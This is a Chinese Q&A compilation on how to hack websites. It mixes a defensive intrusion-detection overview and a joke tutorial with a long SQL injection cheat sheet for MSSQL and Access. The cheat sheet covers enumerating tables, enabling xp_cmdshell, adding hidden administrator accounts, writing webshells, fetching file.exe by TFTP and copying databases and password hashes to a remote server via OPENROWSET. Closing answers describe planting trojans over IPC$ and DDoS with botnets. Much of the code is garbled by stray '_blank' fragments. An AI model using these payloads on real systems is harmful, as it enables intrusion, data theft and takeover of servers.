本文目录一览：

• 1、如何黑网站（BAIDU别删 非恶意）
• 2、怎么侵入别人的系统？
• 3、教育系统的网站怎么黑？
• 4、怎样黑掉对方网站
• 5、黑客是怎么进入网站后台进行控制的
• 6、怎么攻击别人网站

如何黑网站（BAIDU别删 非恶意）

看来你说得太天马行空了,

黑一个网站很多方法,通常要先使用ping找个这个网站的IP等,

后面如何下手就多了,比如我破解你网站的后台账户和登陆密码进入后乱改你的文件或在网页中挂马等等,还有盗域名后改变域名的DNS,

看来你要先入门才行.买书上网任你选.

怎么侵入别人的系统？

一、反攻击技术的核心问题

反攻击技术（入侵检测技术）的核心问题是如何截获所有的网络信息。目前主要是通过两种途径来获取信息，一种是通过网络侦听的途径（如Sniffer，Vpacket等程序）来获取所有的网络信息（数据包信息，网络流量信息、网络状态信息、网络管理信息等），这既是黑客进行攻击的必然途径，也是进行反攻击的必要途径；另一种是通过对操作系统和应用程序的系统日志进行分析，来发现入侵行为和系统潜在的安全漏洞。

二、黑客攻击的主要方式

黑客对网络的攻击方式是多种多样的，一般来讲，攻击总是利用“系统配置的缺陷”，“操作系统的安全漏洞”或“通信协议的安全漏洞”来进行的。到目前为止，已经发现的攻击方式超过2000种，其中对绝大部分黑客攻击手段已经有相应的解决方法，这些攻击大概可以划分为以下六类：

1.拒绝服务攻击：一般情况下，拒绝服务攻击是通过使被攻击对象（通常是工作站或重要服务器）的系统关键资源过载，从而使被攻击对象停止部分或全部服务。目前已知的拒绝服务攻击就有几百种，它是最基本的入侵攻击手段，也是最难对付的入侵攻击之一，典型示例有SYN Flood攻击、Ping Flood攻击、Land攻击、WinNuke攻击等。

2.非授权访问尝试：是攻击者对被保护文件进行读、写或执行的尝试，也包括为获得被保护访问权限所做的尝试。

3.预探测攻击：在连续的非授权访问尝试过程中，攻击者为了获得网络内部的信息及网络周围的信息，通常使用这种攻击尝试，典型示例包括SATAN扫描、端口扫描和IP半途扫描等。

4.可疑活动：是通常定义的“标准”网络通信范畴之外的活动，也可以指网络上不希望有的活动，如IP Unknown Protocol和Duplicate IP Address事件等。

5.协议解码：协议解码可用于以上任何一种非期望的方法中，网络或安全管理员需要进行解码工作，并获得相应的结果，解码后的协议信息可能表明期望的活动，如FTU User和Portmapper Proxy等解码方式。

6.系统代理攻击：这种攻击通常是针对单个主机发起的，而并非整个网络，通过RealSecure系统代理可以对它们进行监视。

三、黑客攻击行为的特征分析与反攻击技术

入侵检测的最基本手段是采用模式匹配的方法来发现入侵攻击行为，要有效的进反攻击首先必须了解入侵的原理和工作机理，只有这样才能做到知己知彼，从而有效的防止入侵攻击行为的发生。下面我们针对几种典型的入侵攻击进行分析，并提出相应的对策。

1.Land攻击

攻击类型：Land攻击是一种拒绝服务攻击。

攻击特征：用于Land攻击的数据包中的源地址和目标地址是相同的，因为当操作系统接收到这类数据包时，不知道该如何处理堆栈中通信源地址和目的地址相同的这种情况，或者循环发送和接收该数据包，消耗大量的系统资源，从而有可能造成系统崩溃或死机等现象。

检测方法：判断网络数据包的源地址和目标地址是否相同。

反攻击方法：适当配置防火墙设备或过滤路由器的过滤规则就可以防止这种攻击行为（一般是丢弃该数据包），并对这种攻击进行审计（记录事件发生的时间，源主机和目标主机的MAC地址和IP地址）。

2.TCP SYN攻击

攻击类型：TCP SYN攻击是一种拒绝服务攻击。

攻击特征：它是利用TCP客户机与服务器之间三次握手过程的缺陷来进行的。攻击者通过伪造源IP地址向被攻击者发送大量的SYN数据包，当被攻击主机接收到大量的SYN数据包时，需要使用大量的缓存来处理这些连接，并将SYN ACK数据包发送回错误的IP地址，并一直等待ACK数据包的回应，最终导致缓存用完，不能再处理其它合法的SYN连接，即不能对外提供正常服务。

检测方法：检查单位时间内收到的SYN连接否收超过系统设定的值。

反攻击方法：当接收到大量的SYN数据包时，通知防火墙阻断连接请求或丢弃这些数据包，并进行系统审计。

3.Ping Of Death攻击

攻击类型：Ping Of Death攻击是一种拒绝服务攻击。

攻击特征：该攻击数据包大于65535个字节。由于部分操作系统接收到长度大于65535字节的数据包时，就会造成内存溢出、系统崩溃、重启、内核失败等后果，从而达到攻击的目的。

检测方法：判断数据包的大小是否大于65535个字节。

反攻击方法：使用新的补丁程序，当收到大于65535个字节的数据包时，丢弃该数据包，并进行系统审计。

4.WinNuke攻击

攻击类型：WinNuke攻击是一种拒绝服务攻击。

攻击特征：WinNuke攻击又称带外传输攻击，它的特征是攻击目标端口，被攻击的目标端口通常是139、138、137、113、53，而且URG位设为“1”，即紧急模式。

检测方法：判断数据包目标端口是否为139、138、137等，并判断URG位是否为“1”。

反攻击方法：适当配置防火墙设备或过滤路由器就可以防止这种攻击手段（丢弃该数据包），并对这种攻击进行审计（记录事件发生的时间，源主机和目标主机的MAC地址和IP地址MAC）。

5.Teardrop攻击

攻击类型：Teardrop攻击是一种拒绝服务攻击。

攻击特征：Teardrop是基于UDP的病态分片数据包的攻击方法，其工作原理是向被攻击者发送多个分片的IP包（IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息），某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。

检测方法：对接收到的分片数据包进行分析，计算数据包的片偏移量（Offset）是否有误。

反攻击方法：添加系统补丁程序，丢弃收到的病态分片数据包并对这种攻击进行审计。

6.TCP／UDP端口扫描

攻击类型：TCP/UDP端口扫描是一种预探测攻击。

攻击特征：对被攻击主机的不同端口发送TCP或UDP连接请求，探测被攻击对象运行的服务类型。

检测方法：统计外界对系统端口的连接请求，特别是对21、23、25、53、80、8000、8080等以外的非常用端口的连接请求。

反攻击方法：当收到多个TCP/UDP数据包对异常端口的连接请求时，通知防火墙阻断连接请求，并对攻击者的IP地址和MAC地址进行审计。

对于某些较复杂的入侵攻击行为（如分布式攻击、组合攻击）不但需要采用模式匹配的方法，还需要利用状态转移、网络拓扑结构等方法来进行入侵检测。

四、入侵检测系统的几点思考

从性能上讲，入侵检测系统面临的一个矛盾就是系统性能与功能的折衷，即对数据进行全面复杂的检验构成了对系统实时性要求很大的挑战。

从技术上讲，入侵检测系统存在一些亟待解决的问题，主要表现在以下几个方面：

1.如何识别“大规模的组合式、分布式的入侵攻击”目前还没有较好的方法和成熟的解决方案。从Yahoo等著名ICP的攻击事件中，我们了解到安全问题日渐突出，攻击者的水平在不断地提高，加上日趋成熟多样的攻击工具，以及越来越复杂的攻击手法，使入侵检测系统必须不断跟踪最新的安全技术。

2.网络入侵检测系统通过匹配网络数据包发现攻击行为，入侵检测系统往往假设攻击信息是明文传输的，因此对信息的改变或重新编码就可能骗过入侵检测系统的检测，因此字符串匹配的方法对于加密过的数据包就显得无能为力。

3.网络设备越来越复杂、越来越多样化就要求入侵检测系统能有所定制，以适应更多的环境的要求。

4.对入侵检测系统的评价还没有客观的标准，标准的不统一使得入侵检测系统之间不易互联。入侵检测系统是一项新兴技术，随着技术的发展和对新攻击识别的增加，入侵检测系统需要不断的升级才能保证网络的安全性。

5.采用不恰当的自动反应同样会给入侵检测系统造成风险。入侵检测系统通常可以与防火墙结合在一起工作，当入侵检测系统发现攻击行为时，过滤掉所有来自攻击者的IP数据包，当一个攻击者假冒大量不同的IP进行模拟攻击时，入侵检测系统自动配置防火墙将这些实际上并没有进行任何攻击的地址都过滤掉，于是造成新的拒绝服务访问。

6.对IDS自身的攻击。与其他系统一样，IDS本身也存在安全漏洞，若对IDS攻击成功，则导致报警失灵，入侵者在其后的行为将无法被记录，因此要求系统应该采取多种安全防护手段。

7.随着网络的带宽的不断增加，如何开发基于高速网络的检测器（事件分析器）仍然存在很多技术上的困难。

入侵检测系统作为网络安全关键性测防系统，具有很多值得进一步深入研究的方面，有待于我们进一步完善，为今后的网络发展提供有效的安全手段。

希望对你能有所帮助。

教育系统的网站怎么黑？

黑客教程：如何黑网站；如果攻击别人电脑；如何破解别人密码！！！

一些黑客惯用手段 包学包会

特别提醒：百度是黑不了的，不要试。

教程一：如何黑网站

方法一：

第一步：

打开IE5.5以上版本，或FireFox1.5以上版本，并且输入目标网址，打开需要被黑的论坛。

第二步：

取一定浓度黑色墨汁少许，口含，将嘴对准你的屏幕正中，喷！！！

第三步：

抬眼看：黑了！！！它黑了！！！

方法二：

第一步：

打开IE5.5以上版本，或FireFox1.5以上版本，并且输入目标网址，打开需要被黑的论坛。

第二步：

找到显示器开关，伸出食指，将食指对准显示器开关按钮，按！！！

第三步：

抬眼看：黑了！！！它黑了！！!

方法三：

第一步：

打开IE5.5以上版本，或FireFox1.5以上版本，并且输入目标网址，打开需要被黑的论坛。

第二步：

找到机箱电源插座，伸出右手，将右手对准插座，拔！！！

第三步：

抬眼看：黑了！！！它黑了！！！

方法四：

第一步：

打开IE5.5以上版本，或FireFox1.5以上版本，并且输入目标网址，打开需要被黑的论坛。

第二步：

取一定大小砖块或金属等硬物，对准你的屏幕正中，扔！！！

第三步：

抬眼看：黑了！！！它黑了！！！

教程二：如何黑别人电脑

步骤：

1.买一桶黑油漆和一把刷子

2.到别人家（走着去或坐车都可以）

3.把他家的电脑用刷子涂抹上黑油漆

好了！这样你就成功地黑了别人的电脑了！恭喜你！

教程三：如何在别人电脑里留下后门和木马

1.到玩具店买一个木马，再到五金店买一个钻孔机

2.到别人家（走着去或坐车去都可以）

3.用钻孔机在他家电脑的机箱后面钻一个洞，把木马塞进去。

怎样黑掉对方网站

入侵网站必备(经典语句)

.判断有无注入点

; and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass

password 等..

and 0(select count(*) from *)

and 0(select

count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到00)--

and 1=(select

count(*) from admin where len(用户字段名称name)0)

and 1=(select count(*) from

admin where len(_blank密码字段名称password)0)

5.猜解各个字段的长度

猜解长度就是把0变换 直到返回正确页面为止

and 1=(select count(*) from admin where

len(*)0)

and 1=(select count(*) from admin where len(name)6) 错误

and 1=(select count(*) from admin where len(name)5) 正确 长度是6

and

1=(select count(*) from admin where len(name)=6) 正确

and 1=(select

count(*) from admin where len(password)11) 正确

and 1=(select count(*)

from admin where len(password)12) 错误 长度是12

and 1=(select count(*) from

admin where len(password)=12) 正确

6.猜解字符

and 1=(select count(*) from

admin where left(name,1)=a) ---猜解用户帐号的第一位

and 1= (select count(*) from admin

where left(name,2)=ab)---猜解用户帐号的第二位

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51) --

这个查询语句可以猜解中文的用户和_blank密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

group by users.id having 1=1--

group by users.id, users.username,

users.password, users.privs having 1= 1--

; insert into users values( 666,

attacker, foobar, 0xffff )--

UNION SELECT TOP 1 COLUMN_blank_NAME

FROM INFORMATION_blank_SCHEMA.COLUMNS WHERE TABLE_blank

_NAME=logintable-

UNION SELECT TOP 1 COLUMN_blank_NAME FROM

INFORMATION_blank_SCHEMA.COLUMNS WHERE TABLE_blank_NAME=logintable WHERE

COLUMN_blank_NAME NOT IN (login_blank_id)-

UNION SELECT TOP 1

COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS WHERE

TABLE_blank_NAME=logintable WHERE COLUMN_blank_NAME NOT IN

(login_blank_id,login_blank_name)-

UNION SELECT TOP 1

login_blank _name FROM logintable-

UNION SELECT TOP 1 password FROM

logintable where login_blank_name=Rahul--

看_blank服务器打的补丁=出错了打了SP4补丁

and 1=(select @@VERSION)--

看_blank数据库连接账号的权限，返回正常，证明是_blank服务器角色sysadmin权限。

and

1=(SELECT IS_blank_SRVROLEMEMBER(sysadmin))--

判断连接_blank数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA）

and sa=(SELECT

System_blank_user)--

and user_blank_name()=dbo--

and

0(select user_blank_name()--

看xp_blank_cmdshell是否删除

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name =

xp_blank_cmdshell)--

xp_blank_cmdshell被删除，恢复,支持绝对路径的恢复

;EXEC

master.dbo.sp_blank_addextendedproc xp_blank_cmdshell,xplog70.dll--

;EXEC master.dbo.sp_blank_addextendedproc xp_blank_cmdshell,c:

\inetpub\wwwroot\xplog70.dll--

反向PING自己实验

;use master;declare @s

int;exec sp_blank_oacreate wscript.shell,@s out;exec sp_blank_oamethod

@s,run,NULL,cmd.exe /c ping 192.168.0.1;--

加帐号

;DECLARE @shell

INT EXEC SP_blank_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank

_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$

1866574 /add--

创建一个虚拟目录E盘：

;declare @o int exec

sp_blank_oacreate wscript.shell, @o out exec sp_blank_oamethod @o, run,

NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w 默认Web站点 -v e,e： \--

访问属性：（配合写入一个webshell）

declare @o int exec sp_blank_oacreate

wscript.shell, @o out exec sp_blank_oamethod @o, run, NULL, cscript.exe

c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

爆库

特殊_blank技巧：:%5c=\ 或者把/和\ 修改%5提交

and 0(select top 1 paths from

newtable)--

得到库名（从1到5都是系统的id，6以上才可以判断）

and 1=(select name from

master.dbo.sysdatabases where dbid=7)--

and 0(select count(*) from

master.dbo.sysdatabases where name1 and dbid=6)

依次提交 dbid = 7,8,9....

得到更多的_blank数据库名

and 0(select top 1 name from

bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin

and 0 (select top

1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。

and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and

name=admin

and uid(str (id))) 暴到UID的数值假设为18779569 uid=id

and

0(select top 1 name from bbs.dbo.syscolumns where id=18779569)

得到一个admin的一个字段,假设为 user_blank_id

and 0(select top 1 name from

bbs.dbo.syscolumns where id=18779569 and name not in

(id,...)) 来暴出其他的字段

and 0_id from BBS.dbo.admin where username1)

可以得到用户名

依次可以得到_blank密码。。。。。假设存在user_blank_id username ,password 等字段

and 0(select count(*) from master.dbo.sysdatabases where

name1 and dbid=6)

and 0 (select top 1 name from

bbs.dbo.sysobjects where xtype=U) 得到表名

and 0(select top 1 name from

bbs.dbo.sysobjects where xtype=U and name not in(Address))

and

0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin

and uid(str(id))) 判断id值

and 0(select top 1 name from

BBS.dbo.syscolumns where id=773577794) 所有字段

?id=-1 union select

1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

?id=-1 union select

1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union，access也好用)

得到WEB路径

;create table [dbo].[swap] ([swappass][char](255));--

and (select top 1

swappass from swap)=1--

;CREATE TABLE newtable(id int IDENTITY(1,1),paths

varchar(500)) Declare @test varchar(20) exec master..xp_blank_regread

@rootkey=HKEY_blank_LOCAL_blank_MACHINE, @key=SYSTEM\CurrentControlSet

\Services\W3SVC\Parameters\Virtual Roots\, @value_blank_name=/, values=@test

OUTPUT insert into paths (path) values(@test)--

;use ku1;--

;create

table cmd (str image);-- 建立image类型的表cmd

存在xp_blank_cmdshell的测试过程：

;exec master..xp_blank_cmdshell dir

;exec

master.dbo.sp_blank_addlogin jiaoniang$;-- 加SQL帐号

;exec

master.dbo.sp_blank_password null,jiaoniang$,1866574;--

;exec

master.dbo.sp_blank_addsrvrolemember jiaoniang$ sysadmin;--

;exec

master.dbo.xp_blank_cmdshell net user jiaoniang$ 1866574 /workstations:*

/times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--

;exec

master.dbo.xp_blank_cmdshell net localgroup administrators jiaoniang$

/add;--

exec master..xp_blank _servicecontrol start, schedule

启动_blank服务

exec master..xp_blank_servicecontrol start, server

;

DECLARE @shell INT EXEC SP_blank_OACREATE wscript.shell,@shell OUTPUT EXEC

SP_blank_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net user

jiaoniang$ 1866574 /add

;DECLARE @shell INT EXEC SP_blank_OACREATE

wscript.shell,@shell OUTPUT EXEC SP_blank_OAMETHOD @shell,run,null,

C：\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add

;

exec master..xp_blank_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件

;declare @a sysname set @a=xp_blank_+cmdshell exec @a dir c:\

;declare @a sysname set @a=xp+_blank_cm’+’dshell exec @a dir c:\

;declare @a;set @a=db_blank_name();backup database @a to

disk=你的IP你的共享目录bak.dat

如果被限制则可以。

select * from openrowset

(_blanksqloledb,server;sa;,select OK! exec master.dbo.sp_blank_addlogin

hax)

查询构造：

SELECT * FROM news WHERE id=... AND topic=... AND .....

adminand 1=(select count(*) from [user] where username=victim and

right(left(userpass,01),1)=1) and userpass　

select 123;--

;use

master;--

:a or name like fff%;-- 显示有一个叫ffff的用户哈。

and 1(select

count (email) from [user]);--

;update [users] set email=(select top 1 name

from sysobjects where xtype=u and status0) where name=ffff;--

;update

[users] set email=(select top 1 id from sysobjects where xtype=u and name=ad)

where name=ffff;--

;update [users] set email=(select top 1 name from

sysobjects where xtype=u and id581577110) where name=ffff;--

;update

[users] set email=(select top 1 count(id) from password) where name=ffff;--

;update [users] set email=(select top 1 pwd from password where id=2) where

name=ffff;--

;update [users] set email=(select top 1 name from password

where id=2) where name=ffff;--

上面的语句是得到_blank数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

通过查看ffff的用户资料可得第一个用表叫ad

然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into

users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

char(0x63)+char (0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

insert

into users values( 667,123,123,0xffff)--

insert into users values ( 123,

admin--, password, 0xffff)--

;and user0

;and (select count(*) from

sysobjects)0

;and (select count(*) from mysysobjects)0

//为access_blank数据库

枚举出数据表名

;update aaa set aaa=(select top 1

name from sysobjects where xtype=u and status0);--

这是将第一个表名更新到aaa的字段处。

读出第一个表，第二个表可以这样读出来（在条件后加上 and name刚才得到的表名）。

;update aaa set

aaa=(select top 1 name from sysobjects where xtype=u and status0 and

namevote);--

然后id=1552 and exists(select * from aaa where aaa5)

读出第二个表，一个个的读出，直到没有为止。

读字段是这样：

;update aaa set aaa=(select top 1

col_blank_name (object_blank_id(表名),1));--

然后id=152 and

exists(select * from aaa where aaa5)出错，得到字段名

;update aaa set aaa=(select

top 1 col_blank_name(object_blank_id(表名),2));--

然后id=152 and

exists(select * from aaa where aaa5)出错，得到字段名

[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]

update 表名 set 字段=(select top 1

name from sysobjects where xtype=u and status0 [ and name你得到的表名

查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and

status0 and name not in(table1,table2,…)

通过SQLSERVER注入_blank漏洞建_blank数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]

update 表名 set 字段= (select

top 1 col_blank_name(object_blank_id(要查询的数据表名),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]

;declare @a sysname set @a=xp_blank_+cmdshell

exec @a dir c:\

;declare @a sysname set @a=xp+_blank_cm’+’dshell exec @a

dir c:\

1、 开启远程_blank数据库

基本语法

select * from

OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )

参数: (1) OLEDB Provider name

2、 其中连接字符串参数可以是任何端口用来连接,比如

select * from

OPENROWSET(SQLOLEDB, uid=sa;pwd= 123;Network=DBMSSOCN;Address=192.168.0.1,1433;,

select * from table

3.复制目标主机的整个_blank数据库

insert所有远程表到本地表。

基本语法：

insert into OPENROWSET(SQLOLEDB,

server=servername;uid=sa;pwd=123, select * from table1) select * from table2

这行语句将目标主机上table2表中的所有数据复制到远程_blank数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=

192.168.0.1,1433;,select * from table1) select * from table2

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=

123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from

_blank_sysdatabases)

select * from master.dbo.sysdatabases

insert

into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=

192.168.0.1,1433;,select * from _blank_sysobjects)

select * from

user_blank _database.dbo.sysobjects

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=

192.168.0.1,1433;,select * from _blank_syscolumns)

select * from

user_blank _database.dbo.syscolumns

复制_blank数据库：

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=

123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select *

from database..table1

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select

* from table2) select * from database..table2

复制哈西表（HASH）登录_blank密码的hash存储于sysxlogins中。方法如下：

insert into

OPENROWSET (SQLOLEDB,

uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from

_blank_sysxlogins) select * from database.dbo.sysxlogins

得到hash之后，就可以进行暴力破解。

遍历目录的方法： 先创建一个临时表：temp

;create table temp(id

nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_blank_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_blank_subdirs c:\;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_blank_dirtree c:\;--

获得所有子目录的目录树结构,并寸入temp表中

;insert into temp(id) exec

master.dbo.xp_blank_cmdshell type c:\web\index.asp;-- 查看某个文件的内容

;insert

into temp(id) exec master.dbo.xp_blank_cmdshell dir c:\;--

;insert into

temp(id) exec master.dbo.xp_blank_cmdshell dir c:\ *.asp /s/a;--

;insert

into temp(id) exec master.dbo.xp_blank _cmdshell cscript

C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc

;insert into temp(id,num1)

exec master.dbo.xp_blank_dirtree c:\;-- （xp_blank_dirtree适用权限PUBLIC）

写入表：

语句1：and 1= (SELECT IS_blank_SRVROLEMEMBER(sysadmin));--

语句2：and 1=(SELECT IS_blank_SRVROLEMEMBER (serveradmin));--

语句3：and

1=(SELECT IS_blank_SRVROLEMEMBER(setupadmin));--

语句4：and 1=(SELECT

IS_blank_SRVROLEMEMBER(securityadmin));--

语句5：and 1=(SELECT

IS_blank_SRVROLEMEMBER (securityadmin));--

语句6：and 1=(SELECT

IS_blank_SRVROLEMEMBER(diskadmin));--

语句7：and 1= (SELECT

IS_blank_SRVROLEMEMBER(bulkadmin));--

语句8：and 1=(SELECT

IS_blank_SRVROLEMEMBER (bulkadmin));--

语句9：and 1=(SELECT

IS_blank_MEMBER(db_blank_owner));--

把路径写到表中去：

;create table

dirs(paths varchar(100), id int)--

;insert dirs exec

master.dbo.xp_blank_dirtree c:\--

and 0(select top 1 paths from

dirs)--

and 0 (select top 1 paths from dirs where paths not

in(@Inetpub))--

;create table dirs1(paths varchar(100), id int)--

;insert dirs exec master.dbo.xp_blank_dirtree e:\web--

and

0(select top 1 paths from dirs1)--

把_blank数据库备份到网页目录：下载

;declare @a sysname; set @a=db_blank_name();backup database @a to

disk=e:\web\down.bak;--

and 1=(Select top 1 name from(Select top 12

id,name from sysobjects where xtype=char(85)) T order by id desc)

and

1=(Select Top 1 col_blank_name(object_blank_id(USER_blank_LOGIN),1)

from sysobjects) 参看相关表。

and 1=(select user_blank_id from

USER_blank_LOGIN)

and 0=(select user from USER_blank_LOGIN where

user1)

-=- wscript.shell example -=-

declare @o int

exec

sp_blank_oacreate wscript.shell, @o out

exec sp_blank_oamethod @o,

run, NULL, notepad.exe

; declare @o int exec sp_blank_oacreate

wscript.shell, @o out exec sp_blank_oamethod @o, run, NULL, notepad.exe--

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_blank_oacreate scripting.filesystemobject, @o out

exec

sp_blank_oamethod @o, opentextfile, @f out, c:\boot.ini, 1

exec @ret =

sp_blank_oamethod @f, readline, @line out

while( @ret = 0 )

begin

print @line

exec @ret = sp_blank_oamethod @f, readline, @line out

end

declare @o int, @f int, @t int, @ret int

exec

sp_blank_oacreate scripting.filesystemobject, @o out

exec

sp_blank_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1

exec @ret = sp_blank_oamethod @f, writeline, NULL,

declare @o int, @ret int

exec sp_blank_oacreate

speech.voicetext, @o out

exec sp_blank _oamethod @o, register, NULL,

foo, bar

exec sp_blank_oasetproperty @o, speed, 150

exec

sp_blank_oamethod @o, speak, NULL, all your sequel servers are belong to,us,

528

waitfor delay 00:00:05

; declare @o int, @ret int exec

sp_blank_oacreate speech.voicetext, @o out exec sp_blank_oamethod @o,

register, NULL, foo, bar exec sp_blank_oasetproperty @o, speed, 150 exec

sp_blank_oamethod @o, speak, NULL, all your sequel servers are belong to us,

528 waitfor delay 00:00:05--

xp_blank_dirtree适用权限PUBLIC

exec

master.dbo.xp_blank_dirtree c:\

返回的信息有两个字段

subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。

create table dirs(paths

varchar(100), id int)

建表，这里建的表是和上面xp_blank_dirtree相关连，字段相等、类型相同。

insert dirs exec master.dbo.xp_blank_dirtree c:\

只要我们建表与存储进程返回的字段相定义相等就能够执行！达到写表的效果,

一步步达到我们想要的信息！　

黑客是怎么进入网站后台进行控制的

给点简单的吧....登如IPC..然后用NET USE 命令把被害者的电脑的中的盘符给映射到本地...然后像平常复制文件的方式一样..把木马病毒之类的东西塞到被害者电脑里..然后再用NET TIME 查一下对方的系统 时间.再用AT命令检立一个执行病毒文件的计划任务.系统已经占领了.替换系统文件让XP也能实现多用户同时登入.上传脚本开启 远程桌面 然后入你的3389端口.远程玩你的系统...!

怎么攻击别人网站

首先你要有大量的肉鸡，用DDOS攻击。就是让你的肉鸡全部去连接要攻击的网站，那样就会造成网站拒绝服务。